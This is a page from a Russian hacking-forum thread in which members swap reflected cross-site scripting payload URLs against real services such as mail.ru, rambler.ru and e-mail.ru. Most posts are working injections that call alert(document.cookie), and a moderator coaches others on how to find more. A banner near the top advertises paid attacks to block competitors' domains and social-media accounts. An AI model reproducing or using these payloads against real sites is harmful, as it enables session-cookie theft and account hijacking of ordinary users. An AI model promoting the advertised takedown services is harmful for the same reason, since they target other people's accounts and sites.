Пассивные xss на почтовых серверах

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Пассивные xss на почтовых серверах

Страница 6 из 25

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

e-mail

#51

15.09.2009, 21:21

Travakur555

Новичок

Регистрация: 14.09.2009

Сообщений: 7

С нами: 8767316

Репутация: 0

e-mail

http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert(%27Sin3v %27)%3C/script%3E

#52

16.09.2009, 14:42

Sin3v

Участник форума

Регистрация: 16.07.2008

Сообщений: 159

С нами: 9379190

Репутация: 240

Mail.ru

Цитата:

http://kv.mail.ru/game/create_character.php?name=%22%3E%3Cscript%3Ealert% 28document.cookie%29%3C/script%3E

Работает у авторизованных.

#53

21.09.2009, 21:48

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

С нами: 9112381

Репутация: 403

за что вы мои XSS удаляете ?

Я их сам находил...

http://www.netman.ru/contacts.phtml в поле имя и фамилия вводим
<'<"><script>alert('XSS')</script><

Последний раз редактировалось Ruslan1817; 21.09.2009 в 21:59..

#54

23.09.2009, 13:02

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

С нами: 9112381

Репутация: 403

http://horoscopes.rambler.ru/astrosystems.html?sid=47670&sign=203672&sec=203657 1"><script>alert(document.cookie)</script>

#55

24.09.2009, 15:39

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

С нами: 9083308

Репутация: 719

пассивка на рамблере

Цитата:

http://id-planet.rambler.ru/main/user/blacklist

строка Найти забаненного

PHP код:


		
			
<img src=foo.png onerror=alert(document.cookie) />

еще одна пассивка на рамблер

PHP код:


		
			
http://autorambler.ru/cars/by-price/?price_from=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&raz=1&price_to=250000&model=303&skip=0&currency=RUR

Последний раз редактировалось satana-fu; 21.10.2009 в 18:24..

#56

24.09.2009, 16:57

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

С нами: 9112381

Репутация: 403

http://torg.mail.ru/844/res/?&"><script>alert(document.cookie)</script>[sort]=2

#57

24.09.2009, 17:03

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

С нами: 9112381

Репутация: 403

http://torg.mail.ru/835/138479/?%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Etab_id=2

#58

24.09.2009, 17:09

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

С нами: 9083308

Репутация: 719

Цитата:

Сообщение от Ruslan1817

первый раз сам нашел... на майле... правда с подсказкой :-)

это тоже твой xss, нашел уже с твоей подсказкой

http://torg.mail.ru/109/res/?"><script>alert(document.cookie)</script>[vendor_id][]=49

#59

24.09.2009, 17:30

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

С нами: 9112381

Репутация: 403

https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1"><script>alert('Sin3 v')</script>
от Sinva

подправил
https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1%3Cimg%20src=%22%3E%3 Cscript%3Ealert(document.cookie)%3C/script%3E

Последний раз редактировалось Ruslan1817; 24.09.2009 в 23:01..

#60

27.09.2009, 04:37

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

С нами: 9083308

Репутация: 719

Цитата:

Сообщение от Ruslan1817

все пассивки прикрыли... как так 0_0

а ты развивай ту. которую начал)))), вот тебе еще пассивка на майл

Цитата:

http://torg.mail.ru/844/res/?%27p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C%2Fscript%3E

улови какая разница между вышестоящим и этим урл ниже

Цитата:

http://torg.mail.ru/844/res/?p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28docu ment.cookie%29%3C%2Fscript%3E

как только догонишь, найдешь кучу пассивных xss на майле

не забудь убрать пробелы

Последний раз редактировалось satana-fu; 21.10.2009 в 15:58..

Страница 6 из 25

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Веб-уязвимости	43	12.01.2021 19:31
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход